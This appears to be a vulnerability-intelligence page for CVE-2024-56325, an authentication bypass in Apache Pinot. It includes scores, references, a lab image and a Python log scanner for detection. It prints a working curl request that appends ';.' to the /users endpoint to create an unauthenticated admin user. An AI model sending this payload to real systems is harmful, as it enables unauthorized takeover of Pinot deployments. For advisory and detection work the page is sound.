CVE-2024-56325

CRITICAL NUCLEI LAB

Apache Pinot < 1.3.0 - Authentication Bypass via Path Manipulation

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-56325. PoCs published by exploitintel. A Nuclei detection template is also available.

AI-analyzed exploit summary: The repository contains functional exploit code demonstrating an authentication bypass vulnerability in Apache Pinot via matrix parameter injection. The PoC scripts bypass authentication by appending a matrix parameter containing a dot (e.g., `;.`) to API endpoints, allowing unauthenticated access to create admin users and exfiltrate data.

Description

Authentication Bypass Issue

If the path does not contain `/` and contains `.`, authentication is not required.

Expected Normal Request and Response Example

    curl -X POST -H "Content-Type: application/json" -d '{"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

    curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' 'http://{serverip}:9000/users;.'

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.
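For detection, the request shape described above can be searched for in HTTP access logs. The following is an added example, not code from this page or from Apache Pinot; the common-log-format lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in common log format (not from a real system).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2025:10:00:01 +0000] "GET /tables HTTP/1.1" 200 512
10.0.0.9 - - [01/Apr/2025:10:00:07 +0000] "POST /users;. HTTP/1.1" 200 12
10.0.0.9 - - [01/Apr/2025:10:00:09 +0000] "GET /users%3B.x HTTP/1.1" 200 40
10.0.0.7 - - [01/Apr/2025:10:00:11 +0000] "GET /index.html HTTP/1.1" 200 900
10.0.0.7 - - [01/Apr/2025:10:00:12 +0000] "GET /tables;v=1 HTTP/1.1" 401 44
10.0.0.8 - - [01/Apr/2025:10:00:15 +0000] "GET /query?sql=a;b.c HTTP/1.1" 401 44
"""

REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def has_dotted_matrix_param(target):
    """True if any path segment carries a ';' matrix parameter containing '.'."""
    # Only the path is inspected; ';' or '.' in the query string is ignored.
    # Decoding once is a conservative choice: it also flags the
    # percent-encoded spelling, whether or not the server honours it.
    path = unquote(urlsplit(target).path)
    for segment in path.split("/"):
        _, sep, params = segment.partition(";")
        if sep and "." in params:
            return True
    return False


def find_suspicious(log_text):
    """Return (method, target, status) for every request matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and has_dotted_matrix_param(m["target"]):
            hits.append((m["method"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for method, target, status in find_suspicious(SAMPLE_LOG):
        print(f"{status} {method} {target}")
```

A flagged request that received a 2xx status on an endpoint that normally answers 401 is the case to triage first. Legitimate matrix parameters with dotted values (for example a version like `;v=1.0`) will also match, so treat hits as leads rather than verdicts.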

Exploits (1)

github WORKING POC 3 stars
by exploitintel · cpoc
https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2024-56325


Classification: Working PoC 100%
Attack Type: Auth Bypass
Complexity: Trivial
Reliability: Reliable
Target: Apache Pinot < 1.3.0
No auth needed
Prerequisites: Docker with Compose plugin · Network access to build/pull images
devstral-2 · analyzed Apr 09, 2026

Nuclei Templates (1)

Apache Pinot < 1.3.0 - Authentication Bypass
CRITICAL · VERIFIED · by iamnoooob, rootxharsh, pdresearch
Shodan: http.favicon.hash:1696974531

References (2)

Core References
Mailing List, Third Party Advisory
http://www.openwall.com/lists/oss-security/2025/03/27/8
Mailing List, Vendor Advisory vendor-advisory
https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v

Scores

CVSS v3 9.8
EPSS 0.2037
EPSS Percentile 95.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Lab Environment

EIP LAB
Docker Lab
broker: docker pull ghcr.io/exploitintel/cve-2024-56325-broker:latest

Details

CWE
CWE-288
Status published
Products (4)
apache/pinot < 1.3.0
org.apache.pinot/pinot-broker 0 - 1.3.0 (Maven)
org.apache.pinot/pinot-common 0 - 1.3.0 (Maven)
org.apache.pinot/pinot-controller 0 - 1.3.0 (Maven)
Published Apr 01, 2025
Tracked Since Feb 18, 2026